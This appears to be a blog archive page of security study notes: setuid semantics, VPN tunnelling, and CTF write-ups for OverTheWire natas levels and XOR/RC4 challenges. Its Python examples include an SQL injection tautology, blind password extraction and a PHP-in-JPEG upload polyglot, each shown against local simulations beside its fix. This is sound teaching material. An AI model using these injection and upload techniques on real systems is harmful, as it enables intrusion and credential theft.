Posts

Showing posts from April, 2020

GET VS POST

GET: requests data. The request has a limited length (it is carried in the URL), and the response can be cached by the browser.
POST: used to change data; the data is sent in the request body, so there is no practical length limit. Each POST request is treated as distinct and is not cached by the browser; for example, an order placed with POST is not silently placed again by replaying a cached request.

setuid VS seteuid

seteuid: When the calling process is not root, it can set the euid only to the real uid or the saved uid, never to root (it has no root capability). When the calling process is root, it can change the euid to any uid, including back to root (it has the root capability). Whether the caller is root or not, seteuid changes only the euid.

setuid: When the calling process is not root, it can change the euid only to the real uid or the saved uid, not to root (no root capability); for example, a set-user-ID binary owned by user2 and run by user1 can switch its euid between user1 and user2. Only the euid changes. When the calling process is root, setuid sets the real uid, the euid and the saved uid to the given, arbitrary, uid.

Differences between setuid and seteuid: when the calling process is root, setuid changes all of the ids (real uid, euid and saved uid), whereas seteuid changes only the euid. Once the real uid has been changed, the OS finds the real uid and the euid equal and there is no privileged id left to switch back to, so the euid cannot be restored; in other words, the change is permanent. ...
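The difference is easiest to see by running both calls in a forked child and reading back the (real, effective, saved) uid triple afterwards. The script below is an added example, not code from the post; it assumes Linux, that uid 65534 ("nobody") exists, and that, when not started as root, the process may only move between its own real and saved uids (which makes the switch a no-op in that case).

```python
import json
import os

# Assumption: uid 65534 ("nobody") exists on this host. A root process switches
# to it; a non-root process can only move between its real and saved uids, so
# it "switches" to its own real uid, which leaves the triple unchanged.
UNPRIV_UID = 65534


def switch_and_try_to_regain(setter, unpriv_uid=UNPRIV_UID):
    """Fork a child, call setter(uid) there, record (ruid, euid, suid), then
    try seteuid() back to the parent's effective uid.

    Returns ((ruid, euid, suid), regained) as observed in the child, or None
    when the switch itself was refused (e.g. an unmapped uid inside a user
    namespace). Forking keeps a permanent setuid() drop away from the caller.
    """
    original_euid = os.geteuid()
    target = unpriv_uid if original_euid == 0 else os.getuid()
    read_end, write_end = os.pipe()
    pid = os.fork()
    if pid == 0:  # child: run the experiment and report over the pipe
        os.close(read_end)
        try:
            setter(target)
            ids = os.getresuid()
            try:
                os.seteuid(original_euid)
                regained = os.geteuid() == original_euid
            except PermissionError:
                regained = False  # EPERM: no privileged id left to return to
            result = [list(ids), regained]
        except OSError:
            result = None
        os.write(write_end, json.dumps(result).encode())
        os._exit(0)
    os.close(write_end)
    chunks = []
    while True:
        chunk = os.read(read_end, 4096)
        if not chunk:
            break
        chunks.append(chunk)
    os.close(read_end)
    os.waitpid(pid, 0)
    result = json.loads(b"".join(chunks))
    return None if result is None else (tuple(result[0]), result[1])


def running_as_root():
    return os.geteuid() == 0


def probe_seteuid():
    """seteuid changes only the euid; the saved uid still holds root."""
    return switch_and_try_to_regain(os.seteuid)


def probe_setuid():
    """setuid as root rewrites all three uids, so the drop is permanent."""
    return switch_and_try_to_regain(os.setuid)


if __name__ == "__main__":
    print("seteuid:", probe_seteuid())
    print("setuid: ", probe_setuid())
```

Run it as root to see the two outcomes side by side: after seteuid the triple is (0, 65534, 0) and the child gets back to euid 0; after setuid it is (65534, 65534, 65534) and seteuid(0) fails with EPERM. Run as an ordinary user it shows the other rule, that a non-root caller can only pick among its own real and saved uids.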

Analysis jpg file---write up for FE01 in Cyber FastTrack

Problem: find the flag in the file. Step 1: when we receive an image file, run the usual routine: binwalk -> strings -> exiftool. The metadata of FE01.jpg contains a base64 string, which is suspicious. Step 2: decode it in the terminal; the decoded bytes are non-printable characters, so the real plaintext is still hidden. Step 3: XOR brute force. The flag is 'follow_the_xor_brick_road'.
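Step 3 in working form, as an added example that is not the post's own script: every candidate key byte is tried, each candidate plaintext is scored for how English-like it is (letter frequencies, underscores and spaces counted as word separators, odd punctuation penalised, any non-printable byte disqualifying the candidate), and the best one wins. The same slice-and-score step generalises to a repeating key of known length, which the function also handles. The sample ciphertext is constructed here (the flag XORed with the byte 0x5a); it is not the data from FE01.jpg, and the frequency table is an ordinary English heuristic, not something from the challenge.

```python
import base64
import string

# English letter frequencies in percent. Heuristic scoring, not a language model.
LETTER_FREQ = {
    "a": 8.2, "b": 1.5, "c": 2.8, "d": 4.3, "e": 12.7, "f": 2.2, "g": 2.0,
    "h": 6.1, "i": 7.0, "j": 0.15, "k": 0.77, "l": 4.0, "m": 2.4, "n": 6.7,
    "o": 7.5, "p": 1.9, "q": 0.095, "r": 6.0, "s": 6.3, "t": 9.1, "u": 2.8,
    "v": 0.98, "w": 2.4, "x": 0.15, "y": 2.0, "z": 0.074,
}
SEPARATOR_WEIGHT = 18.0   # ' ' and '_' (flags use underscores as spaces)
PUNCT_PENALTY = -5.0      # brackets, backslashes, tildes: rare in real text
ALLOWED = set(string.printable.encode()) - {0x0B, 0x0C}


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with a key that repeats cyclically."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def score_text(candidate: bytes) -> float:
    """Higher is more English-like; -inf if any byte is not printable ASCII."""
    total = 0.0
    for b in candidate:
        if b not in ALLOWED:
            return float("-inf")
        ch = chr(b).lower()
        if ch in LETTER_FREQ:
            total += LETTER_FREQ[ch]
        elif ch in " _":
            total += SEPARATOR_WEIGHT
        elif ch.isdigit() or ch in ".,'!?-\n\r\t":
            total += 0.0
        else:
            total += PUNCT_PENALTY
    return total


def best_key_byte(slice_bytes: bytes) -> int:
    """Brute force one key byte: all 256 values, keep the best-scoring plaintext."""
    return max(range(256),
               key=lambda k: score_text(xor_bytes(slice_bytes, bytes([k]))))


def crack_repeating_xor(ciphertext: bytes, key_len: int = 1):
    """key_len == 1 is the single-byte case; for longer keys every key position
    sees the bytes ciphertext[i::key_len] and is solved independently."""
    key = bytes(best_key_byte(ciphertext[i::key_len]) for i in range(key_len))
    return key, xor_bytes(ciphertext, key)


def crack_base64(b64_text: str, key_len: int = 1):
    """Convenience entry point for a base64 blob pulled out of image metadata."""
    return crack_repeating_xor(base64.b64decode(b64_text), key_len)


def ranked_candidates(ciphertext: bytes, top: int = 5):
    """(score, key byte, plaintext) for the best single-byte keys, best first."""
    rows = [(score_text(xor_bytes(ciphertext, bytes([k]))), k,
             xor_bytes(ciphertext, bytes([k]))) for k in range(256)]
    rows.sort(key=lambda row: row[0], reverse=True)
    return rows[:top]


# Constructed sample: "follow_the_xor_brick_road" XORed with 0x5a.
# Not the bytes from FE01.jpg.
SAMPLE_CIPHERTEXT = bytes.fromhex("3c353636352d052e323f052235280538283339310528353b3e")

if __name__ == "__main__":
    key, plaintext = crack_repeating_xor(SAMPLE_CIPHERTEXT)
    print(key.hex(), plaintext)
    for score, k, pt in ranked_candidates(SAMPLE_CIPHERTEXT, 3):
        print(f"{score:7.1f}  key=0x{k:02x}  {pt!r}")
```

The ranking is the part worth looking at when the top candidate is wrong: a key that merely keeps everything printable (for example one that only flips the case bit) scores far below one that also produces common letters and word separators.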

VPN(virtual private network)

VPN (virtual private network). How does a VPN work? Background: a packet must have three properties: the user is authenticated, the content is protected, and integrity is preserved. To achieve this we have to encrypt the packet, but we cannot simply encrypt the whole IP packet: the header would be encrypted too, so routers could neither read it nor update it (TTL and checksum). The solution is IP tunneling. IPsec tunneling works at the IP layer and encapsulates the old IP packet inside a new IP packet; it is implemented in the kernel. TLS/SSL tunneling works at the transport layer and encapsulates the packet inside a TCP or UDP packet; both ends of the tunnel run TLS/SSL on top of TCP/UDP. TLS/SSL tunneling is more popular because updating an application is much easier than updating the OS. What are tun/tap? tun operates at layer 3 (IP) and tap at layer 2 (Ethernet). TUN/TAP provides packet reception and transmission for user-space programs ...
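The "encapsulate the old IP packet in a new one" idea, as an added example rather than anything from the post: a complete inner IPv4 packet becomes the payload of an outer IPv4 packet (protocol 4, IP-in-IP), an intermediate router decrements the TTL and recomputes the checksum of the outer header only, and the far end verifies the outer header and an HMAC over the inner packet before unwrapping it. This is a simplified model of the tunnel-mode layout, not the IPsec ESP wire format: integrity is shown with an HMAC-SHA256 tag and confidentiality (the ESP encryption) is left out; the addresses and key are constructed.

```python
import hashlib
import hmac
import socket
import struct

IPPROTO_IPIP = 4      # outer header: "the payload is another IP packet"
IPPROTO_UDP = 17
HDR = "!BBHHHBBH4s4s"  # IPv4 header without options (20 bytes)
TAG_LEN = 32          # HMAC-SHA256 tag appended to the inner packet


def ip_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum; yields 0 over a header with a valid checksum."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4(src: str, dst: str, proto: int, payload: bytes, ttl: int = 64) -> bytes:
    hdr = struct.pack(HDR, 0x45, 0, 20 + len(payload), 0, 0, ttl, proto, 0,
                      socket.inet_aton(src), socket.inet_aton(dst))
    hdr = hdr[:10] + struct.pack("!H", ip_checksum(hdr)) + hdr[12:]
    return hdr + payload


def parse_ipv4(pkt: bytes) -> dict:
    ver_ihl, _, length, _, _, ttl, proto, _, src, dst = struct.unpack(HDR, pkt[:20])
    ihl = (ver_ihl & 0x0F) * 4
    return {"ttl": ttl, "proto": proto, "src": socket.inet_ntoa(src),
            "dst": socket.inet_ntoa(dst), "header_ok": ip_checksum(pkt[:ihl]) == 0,
            "payload": pkt[ihl:length]}


def tunnel_encapsulate(inner_pkt: bytes, outer_src: str, outer_dst: str, key: bytes) -> bytes:
    """Whole inner packet (header included) + integrity tag, wrapped in a new IP header."""
    tag = hmac.new(key, inner_pkt, hashlib.sha256).digest()
    return build_ipv4(outer_src, outer_dst, IPPROTO_IPIP, inner_pkt + tag)


def router_forward(pkt: bytes) -> bytes:
    """What each hop does: decrement TTL, refresh the checksum. Only the outer
    header is touched; the tunnelled packet is opaque payload. Assumes no options."""
    hdr = bytearray(pkt[:20])
    if hdr[8] <= 1:
        raise ValueError("TTL expired")
    hdr[8] -= 1
    hdr[10:12] = b"\x00\x00"
    hdr[10:12] = struct.pack("!H", ip_checksum(bytes(hdr)))
    return bytes(hdr) + pkt[20:]


def tunnel_decapsulate(pkt: bytes, key: bytes) -> bytes:
    outer = parse_ipv4(pkt)
    if not outer["header_ok"] or outer["proto"] != IPPROTO_IPIP:
        raise ValueError("bad outer header")
    body, tag = outer["payload"][:-TAG_LEN], outer["payload"][-TAG_LEN:]
    if not hmac.compare_digest(tag, hmac.new(key, body, hashlib.sha256).digest()):
        raise ValueError("integrity check failed")
    return body


def integrity_holds(pkt: bytes, key: bytes) -> bool:
    try:
        tunnel_decapsulate(pkt, key)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    key = b"constructed-tunnel-key"
    inner = build_ipv4("10.0.0.5", "10.0.0.9", IPPROTO_UDP, b"hello")
    outer = tunnel_encapsulate(inner, "203.0.113.1", "198.51.100.2", key)
    hop = router_forward(outer)
    print("outer ttl", parse_ipv4(hop)["ttl"], "inner ttl", parse_ipv4(tunnel_decapsulate(hop, key))["ttl"])
```

The router step is the whole point: the outer TTL goes 64 to 63 and its checksum changes, while the inner packet, and therefore the tag over it, is byte-for-byte what the tunnel entry produced. Flip any byte of the tunnelled part and the receiver rejects it.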

ip table

Diffie–Hellman key exchange ---- how to do MITM attack.

sqlmap ---Write up for natas15

Problem: find the password of natas16. Tools: sqlmap. The URL of this problem is 'http://natas15.natas.labs.overthewire.org/'. Step 1: view the source code. Before viewing the source code it looked like a SQL injection; I tried SQL injection, but it only returned whether the user exists. View the source code: in the code we found the reason why it only reports whether the user exists: no code path displays the password, so a plain SQL injection will not reveal it. However, the code also gives us a hint: there is a table named 'users' which contains the passwords. Step 2: find the SQL vulnerability of the website: Let's say that you are auditing a web application and found a web page that accepts dynamic user provided values on GET or POST parameters or HTTP Cookie values or HTTP User-Agent...

SQL injection --- Writeup for natas14

Problem: find the password of natas15. The URL of this problem is 'http://natas14.natas.labs.overthewire.org/'. Step 1: view the source code. As we can see, the server delivers the password if the SQL query returns any rows. Step 2: SQL injection. All we need to do is make the SQL query's condition true. The "#" comments out the rest of the condition. PS: it's a simple SQL injection, but we have to read the source code to determine whether the injected value needs double or single quotation marks.
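Both write-ups (natas14 above and natas15 before it) come down to the same defect, string concatenation into a query, so here is one added example that is not part of either post: a vulnerable login that behaves like natas14 (prints something when the query matches), a user-exists check that behaves like natas15 (answers only yes or no), the tautology bypass for the first, a boolean-based blind extraction for the second (what sqlmap automates), and the parameterised query that closes both. It runs against an in-memory SQLite table with constructed users and passwords, not the natas database; the simulated queries use single quotes and the `--` comment marker (MySQL also accepts `#`), and `substr()` is used for the character oracle because SQLite's `=` is case-sensitive while `LIKE` is not.

```python
import sqlite3
import string

# Constructed data; neither the real natas schema nor its passwords are reproduced.
USERS = [("natas15", "Qz8hLp3Vk2TnR7wY"), ("natas16", "hXq4Tz9mBv2LpK7s")]


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return db


def login_vulnerable(db, username: str, password: str) -> list:
    """natas14 style: the page prints the next password whenever this returns rows.
    Quotes in the input become part of the SQL."""
    query = f"SELECT username FROM users WHERE username='{username}' AND password='{password}'"
    return db.execute(query).fetchall()


def user_exists_vulnerable(db, username: str) -> bool:
    """natas15 style: reveals only whether the query matched anything."""
    query = f"SELECT * FROM users WHERE username='{username}'"
    return len(db.execute(query).fetchall()) > 0


def bypass_login(db) -> list:
    """Tautology: the WHERE clause becomes  username='' OR 1=1 -- ...  (always true)."""
    return login_vulnerable(db, "' OR 1=1 -- ", "anything")


def blind_extract_password(db, target: str,
                           charset: str = string.ascii_letters + string.digits,
                           max_len: int = 64) -> str:
    """Boolean-based blind injection: one yes/no oracle query per (position, character).
    Stops at the first position where no character matches (end of the password)."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            probe = f"{target}' AND substr(password,{pos},1)='{ch}' -- "
            if user_exists_vulnerable(db, probe):
                recovered += ch
                break
        else:
            return recovered
    return recovered


def login_parameterized(db, username: str, password: str) -> list:
    """The fix: values travel as bound parameters, never as SQL text."""
    return db.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("bypass rows:", bypass_login(db))
    print("blind result:", blind_extract_password(db, "natas16"))
    print("parameterised bypass attempt:", login_parameterized(db, "' OR 1=1 -- ", "x"))
```

The blind loop costs at most len(charset) queries per character, which is why tools such as sqlmap add binary-search and timing-based variants; the logic is the same oracle, asked more cleverly.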

Upload Vulnerability --- Write up for natas13

Problem: upload a JPEG file to find the password of natas14. Tools: Burp Suite, Bless. The URL of this problem is 'http://natas12.natas.labs.overthewire.org/'. Upload vulnerability: upload a PHP file instead of the JPEG file and the server will execute it. Step 1: view the source code <html> <head> <!-- This stuff in the header has nothing to do with the level --> <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css"> <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" /> <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" /> <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script> <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script> <script src=http://...
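The vulnerability next to its fix, as an added example that is not from the write-up: a store routine that keeps the client's filename (so `shell.php` lands on disk as `shell.php` and the web server hands it to PHP) beside one that validates the content, bounds the size, and lets the server choose both name and extension. The hex-editor trick the tools list hints at, a file that starts with the JPEG signature and continues with PHP, is constructed here as `POLYGLOT`; the assumption that the server picks the handler by extension models the usual Apache/PHP setup, and the signature check is a plain magic-bytes test, which is why the hardened version does not rely on it alone.

```python
import os
import secrets
import tempfile

JPEG_MAGIC = b"\xff\xd8\xff"
EXECUTABLE_EXTENSIONS = {".php", ".phtml", ".php5", ".phar"}

# Constructed polyglot: JPEG signature followed by PHP. A check that only reads
# the first bytes accepts it as an image.
POLYGLOT = JPEG_MAGIC + b"\xe0" + b"<?php echo 'shell'; ?>"
PLAIN_PHP = b"<?php echo 'shell'; ?>"


def looks_like_jpeg(data: bytes) -> bool:
    return data.startswith(JPEG_MAGIC)


def validate_image(data: bytes, max_size: int = 2 * 1024 * 1024) -> bool:
    """Content check: bounded size and a JPEG signature. Necessary, not sufficient:
    a polyglot passes, so the filename decision below matters just as much."""
    return len(data) <= max_size and looks_like_jpeg(data)


def handler_for(path: str) -> str:
    """Assumption for the example: the web server chooses the handler by extension."""
    ext = os.path.splitext(path)[1].lower()
    return "php" if ext in EXECUTABLE_EXTENSIONS else "static"


def store_vulnerable(upload_dir: str, client_filename: str, data: bytes) -> str:
    """Trusts the client-supplied name: shell.php is stored as shell.php and
    executed on the next request for it."""
    path = os.path.join(upload_dir, os.path.basename(client_filename))
    with open(path, "wb") as f:
        f.write(data)
    return path


def store_hardened(upload_dir: str, client_filename: str, data: bytes) -> str:
    """Server picks a random name and a fixed .jpg extension; the client name is
    ignored, so whatever the body contains it is only ever served as a static file."""
    if not validate_image(data):
        raise ValueError("rejected: not a JPEG or too large")
    path = os.path.join(upload_dir, secrets.token_hex(16) + ".jpg")
    with open(path, "wb") as f:
        f.write(data)
    return path


def demo(upload_dir: str = None):
    """Store the same polyglot both ways and report which handler each path gets."""
    upload_dir = upload_dir or tempfile.mkdtemp()
    vulnerable_path = store_vulnerable(upload_dir, "shell.php", POLYGLOT)
    hardened_path = store_hardened(upload_dir, "shell.php", POLYGLOT)
    return handler_for(vulnerable_path), handler_for(hardened_path)


if __name__ == "__main__":
    print(demo())
```

Beyond this, uploads are normally re-encoded through an image library and served from a host or path where nothing executes; the example stops at the two controls the write-up's vulnerability is about, the content check and who chooses the filename.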

XOR ---Write up for natas 11

Problem: find the password of natas12. The URL of this problem is 'http://natas11.natas.labs.overthewire.org/'. Step 1: understand the source code. <html> <head> <!-- This stuff in the header has nothing to do with the level --> <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css"> <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" /> <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" /> <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script> <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script> <script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script...

md5crypt

RC4 cracker

Problem: decrypt the cipher. Tool: CrypTool. Ciphertext: '1834e1b2170c2ac5212677e3ae48ed42c32810400afca21defab111bc7', encrypted with a 4-character password. How does RC4 work? RC4 is a stream cipher with a variable-length key. The plaintext is XORed with a keystream to produce the ciphertext, so the keystream must be as long as the plaintext. How is the keystream generated? First, initialise the arrays: the state vector S, S[0..255], starts as the identity permutation, and the key (a password such as 'KEY') is repeated as many times as needed to fill a 256-byte array T: T = [K,E,Y,K,E,Y,...]. Second, use T to permute S: for each i, compute a new j from S[i] and T[i] and swap S[i] with S[j]; every step depends on the previous one. Third, generate a keystream with the same length as the plaintext; this too is a sequence of additions and swaps. Last, XOR the plaintext with the keystream to get the ciphertext. Cracking RC4 by brute force: it should be a forward-direction which means w...
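The four steps above and the forward brute-force search, as an added example that is not the post's own cracker: key scheduling (T folded into the key index), keystream generation, the XOR, and a search that tries every key over a chosen alphabet and keeps the first decryption that passes a plaintext filter. The post's ciphertext is included as `PAGE_CIPHERTEXT` for anyone who wants to run the full search; its key is not known here, and over all 95 printable characters the 4-character space is 95**4 (about 81.5 million keys), fine for CrypTool or C but slow in pure Python. The demo search therefore uses a constructed ciphertext with a 4-digit key, so the space is 10**4 and finishes in seconds; the implementation itself is checked against the published "Key"/"Plaintext" and "Wiki"/"pedia" test vectors.

```python
import itertools


def rc4_ksa(key: bytes) -> list:
    """Key scheduling: S starts as the identity permutation and is permuted by
    the key, which is reused cyclically (T[i] == key[i % len(key)])."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S


def rc4_keystream(S: list, n: int) -> bytes:
    """Pseudo-random generation: n keystream bytes, again additions and swaps."""
    S = S[:]  # the caller's permutation is left untouched
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def rc4(key: bytes, data: bytes) -> bytes:
    """Encryption and decryption are the same XOR with the keystream."""
    keystream = rc4_keystream(rc4_ksa(key), len(data))
    return bytes(a ^ b for a, b in zip(data, keystream))


def printable_ascii(pt: bytes) -> bool:
    return all(32 <= b < 127 for b in pt)


def lowercase_words(pt: bytes) -> bool:
    """Stricter filter: only lowercase letters and spaces (fewer false positives)."""
    return all(b == 32 or 97 <= b <= 122 for b in pt)


def brute_force_rc4(ciphertext: bytes, alphabet: str, key_len: int, accept=printable_ascii):
    """Forward search: every key of key_len characters over alphabet, decrypt,
    return the first (key, plaintext) the filter accepts, else None.
    Cost is len(alphabet) ** key_len decryptions."""
    for combo in itertools.product(alphabet, repeat=key_len):
        key = "".join(combo).encode()
        plaintext = rc4(key, ciphertext)
        if accept(plaintext):
            return key, plaintext
    return None


# The ciphertext from the post; 4-character password, not known here.
PAGE_CIPHERTEXT = bytes.fromhex("1834e1b2170c2ac5212677e3ae48ed42c32810400afca21defab111bc7")

# Constructed demo: the key is shown only to build the sample; the search
# below does not use it.
DEMO_KEY = b"4071"
DEMO_PLAINTEXT = b"the quick brown fox"
DEMO_CIPHERTEXT = rc4(DEMO_KEY, DEMO_PLAINTEXT)

if __name__ == "__main__":
    print("self-test:", rc4(b"Key", b"Plaintext").hex())  # bbf316e8d940af0ad3
    print("demo search:", brute_force_rc4(DEMO_CIPHERTEXT, "0123456789", 4, accept=lowercase_words))
```

The plaintext filter is what decides whether a forward search works at all: with only a printable-ASCII test, a long enough key space will eventually produce an accidental all-printable decryption, so narrow the filter (expected charset, a known header, a known word) as much as the target allows.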